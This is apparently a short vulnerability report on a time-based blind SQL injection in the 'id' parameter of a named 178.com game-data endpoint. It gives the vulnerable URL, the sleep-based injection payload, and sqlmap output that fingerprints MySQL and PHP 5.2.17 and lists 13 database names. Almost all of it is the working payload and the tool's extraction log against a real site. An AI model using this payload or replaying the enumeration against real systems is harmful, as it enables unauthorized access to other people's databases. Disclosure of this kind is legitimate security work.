178 SQL Injection for an interface of the game (involving 13 databases)
178 SQL Injection on a site (involving 13 databases)
URL: http:// I .178.com /? _ Action = getgamedata & _ app = game & _ controller = gamedata & id = 1
Parameter id
Http:// I .178.com /? _ Action = getgamedata & _ app = game & _ controller = gamedata & id = 1% 'and sleep (1) and' % '='
---[10:49:49] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.2.17back-end DBMS: MySQL 5[10:49:49] [INFO] fetching database names[10:49:49] [INFO] fetching number of databases[10:49:49] [INFO] resumed: 13[10:49:49] [INFO] resumed: information_schema[10:49:49] [INFO] resumed: game[10:49:49] [INFO] resumed: sns2[10:49:49] [INFO] resuming partial value: sns_a[10:49:49] [WARNING] time-based comparison requires larger statistical model, please wait.............................. do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y[10:50:06] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [10:50:25] [INFO] adjusting time delay to 1 second due to good response timesdmin[10:53:24] [ERROR] invalid character detected. retrying..[10:53:24] [WARNING] increasing time delay to 2 seconds [10:53:25] [INFO] retrieved: sns_album[10:59:02] [INFO] retrieved: sn[11:01:15] [ERROR] invalid character detected. retrying..[11:01:15] [WARNING] increasing time delay to 3 seconds s_api[11:04:44] [INFO] retrieved: sns_bet[11:09:13] [INFO] retrieved: sns_b[11:13:38] [ERROR] invalid character detected. retrying..[11:13:38] [WARNING] increasing time delay to 4 seconds log[11:15:47] [INFO] retrieved: sns_cite[11:20:45] [INFO] retrieved: sns_get_armory[11:30:04] [INFO] retrieved: sns_group[11:36:22] [INFO] retrieved: sns_gsrank[11:42:43] [INFO] retrieved: testavailable databases [13]:[*] game[*] information_schema[*] sns2[*] sns_admin[*] sns_album[*] sns_api[*] sns_bet[*] sns_blog[*] sns_cite[*] sns_get_armory[*] sns_group[*] sns_gsrank[*] test